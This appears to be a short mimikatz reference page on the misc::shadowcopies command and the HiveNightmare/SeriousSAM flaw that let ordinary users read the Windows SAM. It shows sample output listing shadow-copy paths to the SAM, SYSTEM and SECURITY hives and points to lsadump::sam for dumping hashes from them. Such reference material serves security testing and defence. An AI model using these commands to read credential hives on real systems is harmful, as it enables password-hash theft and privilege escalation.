Links

shadowcopies

misc::shadowcopies is used to list the available shadow copies on the system.
The hivenightmare/serious sam vulnerability was discovered by JonasLyk. According to Will Dormann,Builtin\Users had RX access to the SAM, somewhere between Windows 10 1803 and 1809, hence allowing regular users to operate SAM dumping.
Win10 1809 SAM file ACLs
Win10 1090 SAM file ACLs
Win 10.0.19043.1110 (21H1) SAM file ACLs
mimikatz # misc::shadowcopies
ShadowCopy Volume : HarddiskVolumeShadowCopy12
| Path : \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\
| Volume LastWrite: 13/10/2021 10:12:09
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SYSTEM
| LastWrite : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SAM
| LastWrite : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SECURITY
| LastWrite : 20/10/2021 15:07:53
* \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12\Windows\System32\config\SOFTWARE
| LastWrite : 20/10/2021 15:09:00
...Output Omitted...
The then lsadump::sam can be used by defining the shadow copies paths for /sam and /system.
Last modified 2yr ago